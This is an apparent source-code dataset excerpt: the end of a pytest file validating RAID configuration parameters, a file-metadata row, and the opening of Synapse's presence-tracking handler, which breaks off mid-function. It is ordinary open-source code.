"num_of_raid_volumes": 3,
"volume_type": "gp2",
"volume_size": 30,
"volume_iops": 200,
"encrypted": True,
"ebs_kms_key_id": "test",
},
),
],
)
def test_raid_section_from_cfn(mocker, cfn_params_dict, expected_section_dict):
utils.assert_section_from_cfn(mocker, RAID, cfn_params_dict, expected_section_dict)
@pytest.mark.parametrize(
"config_parser_dict, expected_dict_params, expected_message",
[
# default
({"raid default": {}}, {}, None),
# right value
({"raid default": {"raid_type": 1}}, {"raid_type": 1}, None),
({"raid default": {"volume_type": "gp2"}}, {"volume_type": "gp2"}, None),
# invalid value
({"raid default": {"raid_type": "wrong_value"}}, None, "must be an Integer"),
({"raid default": {"volume_type": "wrong_value"}}, None, "invalid value"),
# invalid key
({"raid default": {"invalid_key": "fake_value"}}, None, "'invalid_key' is not allowed in the .* section"),
],
)
def test_raid_section_from_file(mocker, config_parser_dict, expected_dict_params, expected_message):
utils.assert_section_from_file(mocker, RAID, config_parser_dict, expected_dict_params, expected_message)
@pytest.mark.parametrize(
"section_dict, expected_config_parser_dict, expected_message",
[
# default
({}, {"raid default": {}}, None),
# default values
({"volume_iops": 100}, {"raid default": {"volume_iops": "100"}}, "No section.*"),
({"encrypted": False}, {"raid default": {"encrypted": "false"}}, "No section.*"),
# other values
({"volume_iops": 120}, {"raid default": {"volume_iops": "120"}}, None),
({"encrypted": True}, {"raid default": {"encrypted": "true"}}, None),
],
)
def test_raid_section_to_file(mocker, section_dict, expected_config_parser_dict, expected_message):
utils.assert_section_to_file(mocker, RAID, section_dict, expected_config_parser_dict, expected_message)
@pytest.mark.parametrize(
"section_dict, expected_cfn_params", [(DefaultDict["raid"].value, DefaultCfnParams["raid"].value)]
)
def test_raid_section_to_cfn(mocker, section_dict, expected_cfn_params):
utils.assert_section_to_cfn(mocker, RAID, section_dict, expected_cfn_params)
@pytest.mark.parametrize(
"param_key, param_value, expected_value, expected_message",
[
("shared_dir", None, None, None),
("shared_dir", "", None, "Allowed values are"),
("shared_dir", "fake_value", "fake_value", None),
("shared_dir", "/test", "/test", None),
("shared_dir", "/test/test2", "/test/test2", None),
("shared_dir", "/t_ 1-2( ):&;<>t?*+|", "/t_ 1-2( ):&;<>t?*+|", None),
("shared_dir", "//test", None, "has an invalid value"),
("shared_dir", "./test", None, "has an invalid value"),
("shared_dir", "\\test", None, "has an invalid value"),
("shared_dir", ".test", None, "has an invalid value"),
("shared_dir", "/test/.test2", None, "has an invalid value"),
("shared_dir", "/test/.test2/test3", None, "has an invalid value"),
("shared_dir", "/test//test2", None, "has an invalid value"),
("shared_dir", "/test\\test2", None, "has an invalid value"),
("shared_dir", "NONE", "NONE", None), # NONE is evaluated as a valid path
("raid_type", None, None, None),
("raid_type", "", None, "must be an Integer"),
("raid_type", "NONE", None, "must be an Integer"),
("raid_type", "wrong_value", None, "must be an Integer"),
("raid_type", "10", None, "invalid value"),
("raid_type", "3", None, "invalid value"),
("raid_type", "0", 0, None),
("raid_type", "1", 1, None),
("num_of_raid_volumes", None, 2, None),
("num_of_raid_volumes", "", None, "must be an Integer"),
("num_of_raid_volumes", "NONE", None, "must be an Integer"),
("num_of_raid_volumes", "wrong_value", None, "must be an Integer"),
("num_of_raid_volumes", "0", None, "invalid value"),
("num_of_raid_volumes", "1", None, "invalid value"),
("num_of_raid_volumes", "6", None, "invalid value"),
("num_of_raid_volumes", "5", 5, None),
("num_of_raid_volumes", "2", 2, None),
("volume_type", None, "gp2", None),
("volume_type", "", None, "Allowed values are"),
("volume_type", "wrong_value", None, "Allowed values are"),
("volume_type", "io1", "io1", None),
("volume_type", "standard", "standard", None),
("volume_type", "NONE", None, "Allowed values are"),
("volume_size", None, 20, None),
("volume_size", "", None, "must be an Integer"),
("volume_size", "NONE", None, "must be an Integer"),
("volume_size", "wrong_value", None, "must be an Integer"),
("volume_size", "10", 10, None),
("volume_size", "3", 3, None),
("volume_iops", None, 100, None),
("volume_iops", "", None, "must be an Integer"),
("volume_iops", "NONE", None, "must be an Integer"),
("volume_iops", "wrong_value", None, "must be an Integer"),
("volume_iops", "10", 10, None),
("volume_iops", "3", 3, None),
("encrypted", None, False, None),
("encrypted", "", None, "must be a Boolean"),
("encrypted", "NONE", None, "must be a Boolean"),
("encrypted", "true", True, None),
("encrypted", "false", False, None),
("ebs_kms_key_id", None, None, None),
("ebs_kms_key_id", "", "", None),
("ebs_kms_key_id", "fake_value", "fake_value", None),
("ebs_kms_key_id", "test", "test", None),
("ebs_kms_key_id", "NONE", "NONE", None), # NONE is evaluated as a valid kms id
],
)
def test_raid_param_from_file(mocker, param_key, param_value, expected_value, expected_message):
utils.assert_param_from_file(mocker, RAID, param_key, param_value, expected_value, expected_message)
| 46.383234
| 119
| 0.596179
|
c781fefb1bc780b142909aaa30ed9c1e25a3b26f
| 89,039
|
py
|
Python
|
synapse/handlers/presence.py
|
dsonck92/synapse
|
2560b1b6b2f74b5724253396c0e3665fa1f7968c
|
[
"Apache-2.0"
] | 1
|
2022-01-14T05:37:16.000Z
|
2022-01-14T05:37:16.000Z
|
synapse/handlers/presence.py
|
dsonck92/synapse
|
2560b1b6b2f74b5724253396c0e3665fa1f7968c
|
[
"Apache-2.0"
] | null | null | null |
synapse/handlers/presence.py
|
dsonck92/synapse
|
2560b1b6b2f74b5724253396c0e3665fa1f7968c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is responsible for keeping track of presence status of local
and remote users.
The methods that define policy are:
- PresenceHandler._update_states
- PresenceHandler._handle_timeouts
- should_notify
"""
import abc
import contextlib
import logging
from bisect import bisect
from contextlib import contextmanager
from types import TracebackType
from typing import (
TYPE_CHECKING,
Any,
Awaitable,
Callable,
Collection,
Dict,
FrozenSet,
Generator,
Iterable,
List,
Optional,
Set,
Tuple,
Type,
Union,
)
from prometheus_client import Counter
from typing_extensions import ContextManager
import synapse.metrics
from synapse.api.constants import EventTypes, Membership, PresenceState
from synapse.api.errors import SynapseError
from synapse.api.presence import UserPresenceState
from synapse.appservice import ApplicationService
from synapse.events.presence_router import PresenceRouter
from synapse.logging.context import run_in_background
from synapse.logging.utils import log_function
from synapse.metrics import LaterGauge
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.presence import (
ReplicationBumpPresenceActiveTime,
ReplicationPresenceSetState,
)
from synapse.replication.http.streams import ReplicationGetStreamUpdates
from synapse.replication.tcp.commands import ClearUserSyncsCommand
from synapse.replication.tcp.streams import PresenceFederationStream, PresenceStream
from synapse.storage.databases.main import DataStore
from synapse.streams import EventSource
from synapse.types import JsonDict, UserID, get_domain_from_id
from synapse.util.async_helpers import Linearizer
from synapse.util.caches.descriptors import _CacheContext, cached
from synapse.util.metrics import Measure
from synapse.util.wheel_timer import WheelTimer
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
notified_presence_counter = Counter("synapse_handler_presence_notified_presence", "")
federation_presence_out_counter = Counter(
"synapse_handler_presence_federation_presence_out", ""
)
presence_updates_counter = Counter("synapse_handler_presence_presence_updates", "")
timers_fired_counter = Counter("synapse_handler_presence_timers_fired", "")
federation_presence_counter = Counter(
"synapse_handler_presence_federation_presence", ""
)
bump_active_time_counter = Counter("synapse_handler_presence_bump_active_time", "")
get_updates_counter = Counter("synapse_handler_presence_get_updates", "", ["type"])
notify_reason_counter = Counter(
"synapse_handler_presence_notify_reason", "", ["reason"]
)
state_transition_counter = Counter(
"synapse_handler_presence_state_transition", "", ["from", "to"]
)
# If a user was last active in the last LAST_ACTIVE_GRANULARITY, consider them
# "currently_active"
LAST_ACTIVE_GRANULARITY = 60 * 1000
# How long to wait until a new /events or /sync request before assuming
# the client has gone.
SYNC_ONLINE_TIMEOUT = 30 * 1000
# How long to wait before marking the user as idle. Compared against last active
IDLE_TIMER = 5 * 60 * 1000
# How often we expect remote servers to resend us presence.
FEDERATION_TIMEOUT = 30 * 60 * 1000
# How often to resend presence to remote servers
FEDERATION_PING_INTERVAL = 25 * 60 * 1000
# How long we will wait before assuming that the syncs from an external process
# are dead.
EXTERNAL_PROCESS_EXPIRY = 5 * 60 * 1000
# Delay before a worker tells the presence handler that a user has stopped
# syncing.
UPDATE_SYNCING_USERS_MS = 10 * 1000
assert LAST_ACTIVE_GRANULARITY < IDLE_TIMER
class BasePresenceHandler(abc.ABC):
"""Parts of the PresenceHandler that are shared between workers and presence
writer"""
def __init__(self, hs: "HomeServer"):
self.clock = hs.get_clock()
self.store = hs.get_datastore()
self.presence_router = hs.get_presence_router()
self.state = hs.get_state_handler()
self.is_mine_id = hs.is_mine_id
self._federation = None
if hs.should_send_federation():
self._federation = hs.get_federation_sender()
self._federation_queue = PresenceFederationQueue(hs, self)
self._busy_presence_enabled = hs.config.experimental.msc3026_enabled
active_presence = self.store.take_presence_startup_info()
self.user_to_current_state = {state.user_id: state for state in active_presence}
@abc.abstractmethod
async def user_syncing(
self, user_id: str, affect_presence: bool
) -> ContextManager[None]:
"""Returns a context manager that should surround any stream requests
from the user.
This allows us to keep track of who is currently streaming and who isn't
without having to have timers outside of this module to avoid flickering
when users disconnect/reconnect.
Args:
user_id: the user that is starting a sync
affect_presence: If false this function will be a no-op.
Useful for streams that are not associated with an actual
client that is being used by a user.
"""
@abc.abstractmethod
def get_currently_syncing_users_for_replication(self) -> Iterable[str]:
"""Get an iterable of syncing users on this worker, to send to the presence handler
This is called when a replication connection is established. It should return
a list of user ids, which are then sent as USER_SYNC commands to inform the
process handling presence about those users.
Returns:
An iterable of user_id strings.
"""
async def get_state(self, target_user: UserID) -> UserPresenceState:
results = await self.get_states([target_user.to_string()])
return results[0]
async def get_states(
self, target_user_ids: Iterable[str]
) -> List[UserPresenceState]:
"""Get the presence state for users."""
updates_d = await self.current_state_for_users(target_user_ids)
updates = list(updates_d.values())
for user_id in set(target_user_ids) - {u.user_id for u in updates}:
updates.append(UserPresenceState.default(user_id))
return updates
async def current_state_for_users(
self, user_ids: Iterable[str]
) -> Dict[str, UserPresenceState]:
"""Get the current presence state for multiple users.
Returns:
dict: `user_id` -> `UserPresenceState`
"""
states = {
user_id: self.user_to_current_state.get(user_id, None)
for user_id in user_ids
}
missing = [user_id for user_id, state in states.items() if not state]
if missing:
# There are things not in our in memory cache. Lets pull them out of
# the database.
res = await self.store.get_presence_for_users(missing)
states.update(res)
missing = [user_id for user_id, state in states.items() if not state]
if missing:
new = {
user_id: UserPresenceState.default(user_id) for user_id in missing
}
states.update(new)
self.user_to_current_state.update(new)
return states
@abc.abstractmethod
async def set_state(
self,
target_user: UserID,
state: JsonDict,
ignore_status_msg: bool = False,
force_notify: bool = False,
) -> None:
"""Set the presence state of the user.
Args:
target_user: The ID of the user to set the presence state of.
state: The presence state as a JSON dictionary.
ignore_status_msg: True to ignore the "status_msg" field of the `state` dict.
If False, the user's current status will be updated.
force_notify: Whether to force notification of the update to clients.
"""
@abc.abstractmethod
async def bump_presence_active_time(self, user: UserID) -> None:
"""We've seen the user do something that indicates they're interacting
with the app.
"""
async def update_external_syncs_row(
self, process_id: str, user_id: str, is_syncing: bool, sync_time_msec: int
) -> None:
"""Update the syncing users for an external process as a delta.
This is a no-op when presence is handled by a different worker.
Args:
process_id: An identifier for the process the users are
syncing against. This allows synapse to process updates
as user start and stop syncing against a given process.
user_id: The user who has started or stopped syncing
is_syncing: Whether or not the user is now syncing
sync_time_msec: Time in ms when the user was last syncing
"""
pass
async def update_external_syncs_clear(self, process_id: str) -> None:
"""Marks all users that had been marked as syncing by a given process
as offline.
Used when the process has stopped/disappeared.
This is a no-op when presence is handled by a different worker.
"""
pass
async def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: list
) -> None:
"""Process streams received over replication."""
await self._federation_queue.process_replication_rows(
stream_name, instance_name, token, rows
)
def get_federation_queue(self) -> "PresenceFederationQueue":
"""Get the presence federation queue."""
return self._federation_queue
async def maybe_send_presence_to_interested_destinations(
self, states: List[UserPresenceState]
) -> None:
"""If this instance is a federation sender, send the states to all
destinations that are interested. Filters out any states for remote
users.
"""
if not self._federation:
return
states = [s for s in states if self.is_mine_id(s.user_id)]
if not states:
return
hosts_to_states = await get_interested_remotes(
self.store,
self.presence_router,
states,
)
for destination, host_states in hosts_to_states.items():
self._federation.send_presence_to_destinations(host_states, [destination])
async def send_full_presence_to_users(self, user_ids: Collection[str]) -> None:
"""
Adds to the list of users who should receive a full snapshot of presence
upon their next sync. Note that this only works for local users.
Then, grabs the current presence state for a given set of users and adds it
to the top of the presence stream.
Args:
user_ids: The IDs of the local users to send full presence to.
"""
# Retrieve one of the users from the given set
if not user_ids:
raise Exception(
"send_full_presence_to_users must be called with at least one user"
)
user_id = next(iter(user_ids))
# Mark all users as receiving full presence on their next sync
await self.store.add_users_to_send_full_presence_to(user_ids)
# Add a new entry to the presence stream. Since we use stream tokens to determine whether a
# local user should receive a full snapshot of presence when they sync, we need to bump the
# presence stream so that subsequent syncs with no presence activity in between won't result
# in the client receiving multiple full snapshots of presence.
#
# If we bump the stream ID, then the user will get a higher stream token next sync, and thus
# correctly won't receive a second snapshot.
# Get the current presence state for one of the users (defaults to offline if not found)
current_presence_state = await self.get_state(UserID.from_string(user_id))
# Convert the UserPresenceState object into a serializable dict
state = {
"presence": current_presence_state.state,
"status_message": current_presence_state.status_msg,
}
# Copy the presence state to the tip of the presence stream.
# We set force_notify=True here so that this presence update is guaranteed to
# increment the presence stream ID (which resending the current user's presence
# otherwise would not do).
await self.set_state(UserID.from_string(user_id), state, force_notify=True)
async def is_visible(self, observed_user: UserID, observer_user: UserID) -> bool:
raise NotImplementedError(
"Attempting to check presence on a non-presence worker."
)
class _NullContextManager(ContextManager[None]):
"""A context manager which does nothing."""
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
pass
class WorkerPresenceHandler(BasePresenceHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.hs = hs
self._presence_writer_instance = hs.config.worker.writers.presence[0]
self._presence_enabled = hs.config.server.use_presence
# Route presence EDUs to the right worker
hs.get_federation_registry().register_instances_for_edu(
"m.presence",
hs.config.worker.writers.presence,
)
# The number of ongoing syncs on this process, by user id.
# Empty if _presence_enabled is false.
self._user_to_num_current_syncs: Dict[str, int] = {}
self.notifier = hs.get_notifier()
self.instance_id = hs.get_instance_id()
# user_id -> last_sync_ms. Lists the users that have stopped syncing but
# we haven't notified the presence writer of that yet
self.users_going_offline: Dict[str, int] = {}
self._bump_active_client = ReplicationBumpPresenceActiveTime.make_client(hs)
self._set_state_client = ReplicationPresenceSetState.make_client(hs)
self._send_stop_syncing_loop = self.clock.looping_call(
self.send_stop_syncing, UPDATE_SYNCING_USERS_MS
)
self._busy_presence_enabled = hs.config.experimental.msc3026_enabled
hs.get_reactor().addSystemEventTrigger(
"before",
"shutdown",
run_as_background_process,
"generic_presence.on_shutdown",
self._on_shutdown,
)
async def _on_shutdown(self) -> None:
if self._presence_enabled:
self.hs.get_tcp_replication().send_command(
ClearUserSyncsCommand(self.instance_id)
)
def send_user_sync(self, user_id: str, is_syncing: bool, last_sync_ms: int) -> None:
if self._presence_enabled:
self.hs.get_tcp_replication().send_user_sync(
self.instance_id, user_id, is_syncing, last_sync_ms
)
def mark_as_coming_online(self, user_id: str) -> None:
"""A user has started syncing. Send a UserSync to the presence writer,
unless they had recently stopped syncing.
"""
going_offline = self.users_going_offline.pop(user_id, None)
if not going_offline:
# Safe to skip because we haven't yet told the presence writer they
# were offline
self.send_user_sync(user_id, True, self.clock.time_msec())
def mark_as_going_offline(self, user_id: str) -> None:
"""A user has stopped syncing. We wait before notifying the presence
writer as its likely they'll come back soon. This allows us to avoid
sending a stopped syncing immediately followed by a started syncing
notification to the presence writer
"""
self.users_going_offline[user_id] = self.clock.time_msec()
def send_stop_syncing(self) -> None:
"""Check if there are any users who have stopped syncing a while ago and
haven't come back yet. If there are poke the presence writer about them.
"""
now = self.clock.time_msec()
for user_id, last_sync_ms in list(self.users_going_offline.items()):
if now - last_sync_ms > UPDATE_SYNCING_USERS_MS:
self.users_going_offline.pop(user_id, None)
self.send_user_sync(user_id, False, last_sync_ms)
async def user_syncing(
self, user_id: str, affect_presence: bool
) -> ContextManager[None]:
"""Record that a user is syncing.
Called by the sync and events servlets to record that a user has connected to
this worker and is waiting for some events.
"""
if not affect_presence or not self._presence_enabled:
return _NullContextManager()
curr_sync = self._user_to_num_current_syncs.get(user_id, 0)
self._user_to_num_current_syncs[user_id] = curr_sync + 1
# If we went from no in flight sync to some, notify replication
if self._user_to_num_current_syncs[user_id] == 1:
self.mark_as_coming_online(user_id)
def _end() -> None:
# We check that the user_id is in user_to_num_current_syncs because
# user_to_num_current_syncs may have been cleared if we are
# shutting down.
if user_id in self._user_to_num_current_syncs:
self._user_to_num_current_syncs[user_id] -= 1
# If we went from one in flight sync to non, notify replication
if self._user_to_num_current_syncs[user_id] == 0:
self.mark_as_going_offline(user_id)
@contextlib.contextmanager
def _user_syncing() -> Generator[None, None, None]:
try:
yield
finally:
_end()
return _user_syncing()
async def notify_from_replication(
self, states: List[UserPresenceState], stream_id: int
) -> None:
parties = await get_interested_parties(self.store, self.presence_router, states)
room_ids_to_states, users_to_states = parties
self.notifier.on_new_event(
"presence_key",
stream_id,
rooms=room_ids_to_states.keys(),
users=users_to_states.keys(),
)
async def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: list
) -> None:
await super().process_replication_rows(stream_name, instance_name, token, rows)
if stream_name != PresenceStream.NAME:
return
states = [
UserPresenceState(
row.user_id,
row.state,
row.last_active_ts,
row.last_federation_update_ts,
row.last_user_sync_ts,
row.status_msg,
row.currently_active,
)
for row in rows
]
# The list of states to notify sync streams and remote servers about.
# This is calculated by comparing the old and new states for each user
# using `should_notify(..)`.
#
# Note that this is necessary as the presence writer will periodically
# flush presence state changes that should not be notified about to the
# DB, and so will be sent over the replication stream.
state_to_notify = []
for new_state in states:
old_state = self.user_to_current_state.get(new_state.user_id)
self.user_to_current_state[new_state.user_id] = new_state
if not old_state or should_notify(old_state, new_state):
state_to_notify.append(new_state)
stream_id = token
await self.notify_from_replication(state_to_notify, stream_id)
# If this is a federation sender, notify about presence updates.
await self.maybe_send_presence_to_interested_destinations(state_to_notify)
def get_currently_syncing_users_for_replication(self) -> Iterable[str]:
return [
user_id
for user_id, count in self._user_to_num_current_syncs.items()
if count > 0
]
async def set_state(
self,
target_user: UserID,
state: JsonDict,
ignore_status_msg: bool = False,
force_notify: bool = False,
) -> None:
"""Set the presence state of the user.
Args:
target_user: The ID of the user to set the presence state of.
state: The presence state as a JSON dictionary.
ignore_status_msg: True to ignore the "status_msg" field of the `state` dict.
If False, the user's current status will be updated.
force_notify: Whether to force notification of the update to clients.
"""
presence = state["presence"]
valid_presence = (
PresenceState.ONLINE,
PresenceState.UNAVAILABLE,
PresenceState.OFFLINE,
PresenceState.BUSY,
)
if presence not in valid_presence or (
presence == PresenceState.BUSY and not self._busy_presence_enabled
):
raise SynapseError(400, "Invalid presence state")
user_id = target_user.to_string()
# If presence is disabled, no-op
if not self.hs.config.server.use_presence:
return
# Proxy request to instance that writes presence
await self._set_state_client(
instance_name=self._presence_writer_instance,
user_id=user_id,
state=state,
ignore_status_msg=ignore_status_msg,
force_notify=force_notify,
)
async def bump_presence_active_time(self, user: UserID) -> None:
"""We've seen the user do something that indicates they're interacting
with the app.
"""
# If presence is disabled, no-op
if not self.hs.config.server.use_presence:
return
# Proxy request to instance that writes presence
user_id = user.to_string()
await self._bump_active_client(
instance_name=self._presence_writer_instance, user_id=user_id
)
class PresenceHandler(BasePresenceHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.hs = hs
self.server_name = hs.hostname
self.wheel_timer: WheelTimer[str] = WheelTimer()
self.notifier = hs.get_notifier()
self._presence_enabled = hs.config.server.use_presence
federation_registry = hs.get_federation_registry()
federation_registry.register_edu_handler("m.presence", self.incoming_presence)
LaterGauge(
"synapse_handlers_presence_user_to_current_state_size",
"",
[],
lambda: len(self.user_to_current_state),
)
now = self.clock.time_msec()
for state in self.user_to_current_state.values():
self.wheel_timer.insert(
now=now, obj=state.user_id, then=state.last_active_ts + IDLE_TIMER
)
self.wheel_timer.insert(
now=now,
obj=state.user_id,
then=state.last_user_sync_ts + SYNC_ONLINE_TIMEOUT,
)
if self.is_mine_id(state.user_id):
self.wheel_timer.insert(
now=now,
obj=state.user_id,
then=state.last_federation_update_ts + FEDERATION_PING_INTERVAL,
)
else:
self.wheel_timer.insert(
now=now,
obj=state.user_id,
then=state.last_federation_update_ts + FEDERATION_TIMEOUT,
)
# Set of users who have presence in the `user_to_current_state` that
# have not yet been persisted
self.unpersisted_users_changes: Set[str] = set()
hs.get_reactor().addSystemEventTrigger(
"before",
"shutdown",
run_as_background_process,
"presence.on_shutdown",
self._on_shutdown,
)
self._next_serial = 1
# Keeps track of the number of *ongoing* syncs on this process. While
# this is non zero a user will never go offline.
self.user_to_num_current_syncs: Dict[str, int] = {}
# Keeps track of the number of *ongoing* syncs on other processes.
# While any sync is ongoing on another process the user will never
# go offline.
# Each process has a unique identifier and an update frequency. If
# no update is received from that process within the update period then
# we assume that all the sync requests on that process have stopped.
# Stored as a dict from process_id to set of user_id, and a dict of
# process_id to millisecond timestamp last updated.
self.external_process_to_current_syncs: Dict[str, Set[str]] = {}
self.external_process_last_updated_ms: Dict[str, int] = {}
self.external_sync_linearizer = Linearizer(name="external_sync_linearizer")
if self._presence_enabled:
# Start a LoopingCall in 30s that fires every 5s.
# The initial delay is to allow disconnected clients a chance to
# reconnect before we treat them as offline.
def run_timeout_handler() -> Awaitable[None]:
return run_as_background_process(
"handle_presence_timeouts", self._handle_timeouts
)
self.clock.call_later(
30, self.clock.looping_call, run_timeout_handler, 5000
)
def run_persister() -> Awaitable[None]:
return run_as_background_process(
"persist_presence_changes", self._persist_unpersisted_changes
)
self.clock.call_later(60, self.clock.looping_call, run_persister, 60 * 1000)
LaterGauge(
"synapse_handlers_presence_wheel_timer_size",
"",
[],
lambda: len(self.wheel_timer),
)
# Used to handle sending of presence to newly joined users/servers
if self._presence_enabled:
self.notifier.add_replication_callback(self.notify_new_event)
# Presence is best effort and quickly heals itself, so lets just always
# stream from the current state when we restart.
self._event_pos = self.store.get_room_max_stream_ordering()
self._event_processing = False
async def _on_shutdown(self) -> None:
"""Gets called when shutting down. This lets us persist any updates that
we haven't yet persisted, e.g. updates that only changes some internal
timers. This allows changes to persist across startup without having to
persist every single change.
If this does not run it simply means that some of the timers will fire
earlier than they should when synapse is restarted. This affect of this
is some spurious presence changes that will self-correct.
"""
# If the DB pool has already terminated, don't try updating
if not self.store.db_pool.is_running():
return
logger.info(
"Performing _on_shutdown. Persisting %d unpersisted changes",
len(self.user_to_current_state),
)
if self.unpersisted_users_changes:
await self.store.update_presence(
[
self.user_to_current_state[user_id]
for user_id in self.unpersisted_users_changes
]
)
logger.info("Finished _on_shutdown")
async def _persist_unpersisted_changes(self) -> None:
"""We periodically persist the unpersisted changes, as otherwise they
may stack up and slow down shutdown times.
"""
unpersisted = self.unpersisted_users_changes
self.unpersisted_users_changes = set()
if unpersisted:
logger.info("Persisting %d unpersisted presence updates", len(unpersisted))
await self.store.update_presence(
[self.user_to_current_state[user_id] for user_id in unpersisted]
)
async def _update_states(
self, new_states: Iterable[UserPresenceState], force_notify: bool = False
) -> None:
"""Updates presence of users. Sets the appropriate timeouts. Pokes
the notifier and federation if and only if the changed presence state
should be sent to clients/servers.
Args:
new_states: The new user presence state updates to process.
force_notify: Whether to force notifying clients of this presence state update,
even if it doesn't change the state of a user's presence (e.g online -> online).
This is currently used to bump the max presence stream ID without changing any
user's presence (see PresenceHandler.add_users_to_send_full_presence_to).
"""
now = self.clock.time_msec()
with Measure(self.clock, "presence_update_states"):
# NOTE: We purposefully don't await between now and when we've
# calculated what we want to do with the new states, to avoid races.
to_notify = {} # Changes we want to notify everyone about
to_federation_ping = {} # These need sending keep-alives
# Only bother handling the last presence change for each user
new_states_dict = {}
for new_state in new_states:
new_states_dict[new_state.user_id] = new_state
new_states = new_states_dict.values()
for new_state in new_states:
user_id = new_state.user_id
# Its fine to not hit the database here, as the only thing not in
# the current state cache are OFFLINE states, where the only field
# of interest is last_active which is safe enough to assume is 0
# here.
prev_state = self.user_to_current_state.get(
user_id, UserPresenceState.default(user_id)
)
new_state, should_notify, should_ping = handle_update(
prev_state,
new_state,
is_mine=self.is_mine_id(user_id),
wheel_timer=self.wheel_timer,
now=now,
)
if force_notify:
should_notify = True
self.user_to_current_state[user_id] = new_state
if should_notify:
to_notify[user_id] = new_state
elif should_ping:
to_federation_ping[user_id] = new_state
# TODO: We should probably ensure there are no races hereafter
presence_updates_counter.inc(len(new_states))
if to_notify:
notified_presence_counter.inc(len(to_notify))
await self._persist_and_notify(list(to_notify.values()))
self.unpersisted_users_changes |= {s.user_id for s in new_states}
self.unpersisted_users_changes -= set(to_notify.keys())
# Check if we need to resend any presence states to remote hosts. We
# only do this for states that haven't been updated in a while to
# ensure that the remote host doesn't time the presence state out.
#
# Note that since these are states that have *not* been updated,
# they won't get sent down the normal presence replication stream,
# and so we have to explicitly send them via the federation stream.
to_federation_ping = {
user_id: state
for user_id, state in to_federation_ping.items()
if user_id not in to_notify
}
if to_federation_ping:
federation_presence_out_counter.inc(len(to_federation_ping))
hosts_to_states = await get_interested_remotes(
self.store,
self.presence_router,
list(to_federation_ping.values()),
)
for destination, states in hosts_to_states.items():
self._federation_queue.send_presence_to_destinations(
states, [destination]
)
async def _handle_timeouts(self) -> None:
"""Checks the presence of users that have timed out and updates as
appropriate.
"""
logger.debug("Handling presence timeouts")
now = self.clock.time_msec()
# Fetch the list of users that *may* have timed out. Things may have
# changed since the timeout was set, so we won't necessarily have to
# take any action.
users_to_check = set(self.wheel_timer.fetch(now))
# Check whether the lists of syncing processes from an external
# process have expired.
expired_process_ids = [
process_id
for process_id, last_update in self.external_process_last_updated_ms.items()
if now - last_update > EXTERNAL_PROCESS_EXPIRY
]
for process_id in expired_process_ids:
# For each expired process drop tracking info and check the users
# that were syncing on that process to see if they need to be timed
# out.
users_to_check.update(
self.external_process_to_current_syncs.pop(process_id, ())
)
self.external_process_last_updated_ms.pop(process_id)
states = [
self.user_to_current_state.get(user_id, UserPresenceState.default(user_id))
for user_id in users_to_check
]
timers_fired_counter.inc(len(states))
syncing_user_ids = {
user_id
for user_id, count in self.user_to_num_current_syncs.items()
if count
}
for user_ids in self.external_process_to_current_syncs.values():
syncing_user_ids.update(user_ids)
changes = handle_timeouts(
states,
is_mine_fn=self.is_mine_id,
syncing_user_ids=syncing_user_ids,
now=now,
)
return await self._update_states(changes)
async def bump_presence_active_time(self, user: UserID) -> None:
"""We've seen the user do something that indicates they're interacting
with the app.
"""
# If presence is disabled, no-op
if not self.hs.config.server.use_presence:
return
user_id = user.to_string()
bump_active_time_counter.inc()
prev_state = await self.current_state_for_user(user_id)
new_fields: Dict[str, Any] = {"last_active_ts": self.clock.time_msec()}
if prev_state.state == PresenceState.UNAVAILABLE:
new_fields["state"] = PresenceState.ONLINE
await self._update_states([prev_state.copy_and_replace(**new_fields)])
async def user_syncing(
self, user_id: str, affect_presence: bool = True
) -> ContextManager[None]:
"""Returns a context manager that should surround any stream requests
from the user.
This allows us to keep track of who is currently streaming and who isn't
without having to have timers outside of this module to avoid flickering
when users disconnect/reconnect.
Args:
user_id
affect_presence: If false this function will be a no-op.
Useful for streams that are not associated with an actual
client that is being used by a user.
"""
# Override if it should affect the user's presence, if presence is
# disabled.
if not self.hs.config.server.use_presence:
affect_presence = False
if affect_presence:
curr_sync = self.user_to_num_current_syncs.get(user_id, 0)
self.user_to_num_current_syncs[user_id] = curr_sync + 1
prev_state = await self.current_state_for_user(user_id)
if prev_state.state == PresenceState.OFFLINE:
# If they're currently offline then bring them online, otherwise
# just update the last sync times.
await self._update_states(
[
prev_state.copy_and_replace(
state=PresenceState.ONLINE,
last_active_ts=self.clock.time_msec(),
last_user_sync_ts=self.clock.time_msec(),
)
]
)
else:
await self._update_states(
[
prev_state.copy_and_replace(
last_user_sync_ts=self.clock.time_msec()
)
]
)
async def _end() -> None:
try:
self.user_to_num_current_syncs[user_id] -= 1
prev_state = await self.current_state_for_user(user_id)
await self._update_states(
[
prev_state.copy_and_replace(
last_user_sync_ts=self.clock.time_msec()
)
]
)
except Exception:
logger.exception("Error updating presence after sync")
@contextmanager
def _user_syncing() -> Generator[None, None, None]:
try:
yield
finally:
if affect_presence:
run_in_background(_end)
return _user_syncing()
def get_currently_syncing_users_for_replication(self) -> Iterable[str]:
# since we are the process handling presence, there is nothing to do here.
return []
async def update_external_syncs_row(
self, process_id: str, user_id: str, is_syncing: bool, sync_time_msec: int
) -> None:
"""Update the syncing users for an external process as a delta.
Args:
process_id: An identifier for the process the users are
syncing against. This allows synapse to process updates
as user start and stop syncing against a given process.
user_id: The user who has started or stopped syncing
is_syncing: Whether or not the user is now syncing
sync_time_msec: Time in ms when the user was last syncing
"""
with (await self.external_sync_linearizer.queue(process_id)):
prev_state = await self.current_state_for_user(user_id)
process_presence = self.external_process_to_current_syncs.setdefault(
process_id, set()
)
updates = []
if is_syncing and user_id not in process_presence:
if prev_state.state == PresenceState.OFFLINE:
updates.append(
